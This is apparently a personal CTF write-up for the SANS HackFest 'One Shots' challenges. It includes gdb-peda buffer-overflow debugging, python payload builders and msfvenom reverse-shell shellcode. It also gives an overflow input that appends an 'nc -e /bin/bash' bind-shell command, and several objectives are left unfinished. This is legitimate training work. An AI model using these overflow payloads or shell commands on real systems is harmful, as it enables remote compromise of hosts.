One Shots

Flags

ObjectiveFlag
0x01
0x02
0x03
0x04

0x01

Briefing

nc warmup.ooctf.com 5555

Get a shell and read flag in /home/warmup.

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking

Challenge Files

warmup Download

Solution

I ran the binary and saw that I can seg fault it. one-1

Opened the bin in gdb-peda. Had to install gdb with apt, git clone peda to /opt/peda, and echo "source /opt/peda/peda.py" >> ~/.gdbinit.

gdb warmup

Pasted image 20220908202543

First create 100 char pattern:

gdb-peda$ pattern_create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'

Then I run with r, then I paste in my string at the prompt:

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x01/warmup 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Warmup remote shell.
system @ 0xf7dfd120
> 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd010 ("'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
EBX: 0x41414541 ('AEAA')
ECX: 0xffffd076 --> 0x9700000a
EDX: 0xfbad208b
ESI: 0xf7fa2000 --> 0x1e9d6c
EDI: 0xf7fa2000 --> 0x1e9d6c
EBP: 0x30414161 ('aAA0')
ESP: 0xffffd040 ("AbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
EIP: 0x41464141 ('AAFA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41464141
[------------------------------------stack-------------------------------------]
0000| 0xffffd040 ("AbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0004| 0xffffd044 ("1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0008| 0xffffd048 ("AAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0012| 0xffffd04c ("A2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0016| 0xffffd050 ("HAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0020| 0xffffd054 ("AA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0024| 0xffffd058 ("AIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0028| 0xffffd05c ("eAA4AAJAAfAA5AAKAAgAA6AAL'\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41464141 in ?? ()

I got a seg fault at address 0x41464141. Where is that?

gdb-peda$ pattern_offset 0x41464141
1095123265 found at offset: 43

It's at offset 43. To make sure I have the right EIP location, I'll send 43 A's, 4 B's, and 4 C's. All four B's should land in the EIP. (I had to send 44 A's for some reason, to get 0x42424242).

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x01/warmup
Warmup remote shell.
system @ 0xf7dfd120
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd070 ('A' <repeats 44 times>, "BBBBCCCC\n")
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd0a4 --> 0xa ('\n')
EDX: 0xfbad208b
ESI: 0xf7fa2000 --> 0x1e9d6c
EDI: 0xf7fa2000 --> 0x1e9d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd0a0 ("CCCC\n")
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd0a0 ("CCCC\n")
0004| 0xffffd0a4 --> 0xa ('\n')
0008| 0xffffd0a8 --> 0x0
0012| 0xffffd0ac --> 0xf7dd6fd6 (<__libc_start_main+262>:       add    esp,0x10)
0016| 0xffffd0b0 --> 0xf7fa2000 --> 0x1e9d6c
0020| 0xffffd0b4 --> 0xf7fa2000 --> 0x1e9d6c
0024| 0xffffd0b8 --> 0x0
0028| 0xffffd0bc --> 0xf7dd6fd6 (<__libc_start_main+262>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

I can see that my C's landed in the ESP register. This would be perfect for my shellcode.

Checking out the above output, I can see that the C's landed at 0xffffd0a0, immediately after. Let's see if a 1500 byte payload works. I made a python script to print this out for me.

#!/usr/bin/env python3

# Size to trigger exploit is 44 bytes. EIP immediately after.
filler = 'A' * 44
eip = 'B' * 4
shellcode = 'D' * (1500 - len(filler) - len(eip))

inputBuffer = filler + eip + shellcode

print(inputBuffer)

No, that overflowed the command. I'll try with a total size of 550.

#!/usr/bin/env python3

# Size to trigger exploit is 44 bytes. EIP immediately after.
filler = 'A' * 44
eip = 'B' * 4
shellcode = 'D' * (550 - len(filler) - len(eip))

inputBuffer = filler + eip + shellcode

print(inputBuffer)

I kept doing this until I got a sig fault that didn't overflow any portion of the D's into the next command within GDB itself. This was at 255 - 44 -4.

#!/usr/bin/env python3

# Size to trigger exploit is 44 bytes. EIP immediately after.
filler = 'A' * 44
eip = 'B' * 4
shellcode = 'D' * (255 - len(filler) - len(eip))
#shellcode = 'D' * 4

inputBuffer = filler + eip + shellcode

print(inputBuffer)

That means that I have a 207 byte payload window.

Ok, I can generate a 74 byte rev shell it looks like.

 msfvenom -p linux/x64/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 335 bytes
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x15\xb3\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

None of that is working. WAIT! Can I just type the command in straight up? That looks like it might have worked. Pasted image 20220908203051

That definitely worked on my local box. one-2

I need to use a bind shell though. Once the CTF opens tomorrow I should be able to just run the shellcode python file, connect to the service, and execute.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDnc -nvlp 1234 -e /bin/bash

This did not end up working when the CTF opened back up. I ran out of time to continue working on this objective.

0x02

Briefing

nc baby-rop.ooctf.com 9999

Get a shell and cat the flag in the /home/babyrop directory.

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking

Challenge Files

babyrop Download

Solution

First let's see what's going on here, yeah, same terminal prompt.

./babyrop
Simple ROP.
>

Open in gdb. Pattern create 100.

gdb-peda$ pattern_create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'

Now does it break? Yes.

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x02/babyrop
Simple ROP.
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffded0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
RBX: 0x0
RCX: 0x7ffff7ed68be (<__GI___libc_read+14>:     cmp    rax,0xfffffffffffff000)
RDX: 0x0
RSI: 0x7ffff7fa6a23 --> 0xfa96a0000000000a
RDI: 0x7ffff7fa96a0 --> 0x0
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffdef8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
RIP: 0x401164 (<vuln+34>:       ret)
R8 : 0x7fffffffded0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
R9 : 0x0
R10: 0x400408 --> 0x7473007374656766 ('fgets')
R11: 0x246
R12: 0x401060 (<_start>:        xor    ebp,ebp)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40115d <vuln+27>:  call   0x401040 <fgets@plt>
   0x401162 <vuln+32>:  nop
   0x401163 <vuln+33>:  leave
=> 0x401164 <vuln+34>:  ret
   0x401165 <main>:     push   rbp
   0x401166 <main+1>:   mov    rbp,rsp
   0x401169 <main+4>:   mov    rax,QWORD PTR [rip+0x2ee0]        # 0x404050 <stdin@@GLIBC_2.2.5>
   0x401170 <main+11>:  mov    ecx,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdef8 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0008| 0x7fffffffdf00 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0016| 0x7fffffffdf08 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0024| 0x7fffffffdf10 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0032| 0x7fffffffdf18 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0040| 0x7fffffffdf20 ("AJAAfAA5AAKAAgAA6AAL\n")
0048| 0x7fffffffdf28 ("AAKAAgAA6AAL\n")
0056| 0x7fffffffdf30 --> 0xa4c414136 ('6AAL\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000401164 in vuln ()

Can this really be the same answer again?

It wasn't. I ran out of time and did not perform any further work on this objective.

0x03

Briefing

Access the site at http://fileserver.ooctf.com:8080 and find the flag.

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

Challenge Files

fileserver Download

Solution

Oh ok, I can list dir contents and stuff.

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x03/fileserver
GET /test.txt
;
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 5
Content-type: text/plain

test
[Inferior 1 (process 8337) exited normally]

I can list my cwd contents:

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x03/fileserver
GET /
;
HTTP/1.1 200 OK
Content-Type: text/html

<html><head><style>body{font-family: monospace; font-size: 13px;}td {padding: 1.5px 6px;}</style><h1>Initech Developer Tool Server</h1><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><table>
<tr><td><a href=".gdb_history">.gdb_history</a></td><td>2021-11-15 21:44</td><td>7</td></tr>
<tr><td><a href="peda-session-fileserver.txt">peda-session-fileserver.txt</a></td><td>2021-11-15 21:58</td><td>8</td></tr>
<tr><td><a href="fileserver">fileserver</a></td><td>2021-11-15 14:06</td><td>21.1K</td></tr>
<tr><td><a href="test.txt">test.txt</a></td><td>2021-11-15 21:45</td><td>5</td></tr>
<tr><td><a href="testdir/">testdir/</a></td><td>2021-11-15 21:47</td><td>[DIR]</td></tr>
</table><br>logged in as: <b>Guest</b></body></html>[Inferior 1 (process 8338) exited normally]

I ran out of time and did not perform any more work on this objective.

0x04

Briefing

nc vbox.ooctf.com 6800

Obtain a shell and then run cat /home/vbox/vbox.flag

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

SEC760: Advanced Exploit Development for Penetration Testers

Challenge Files

vbox Download

Solution

I ran out of time and did not perform and work on this objective.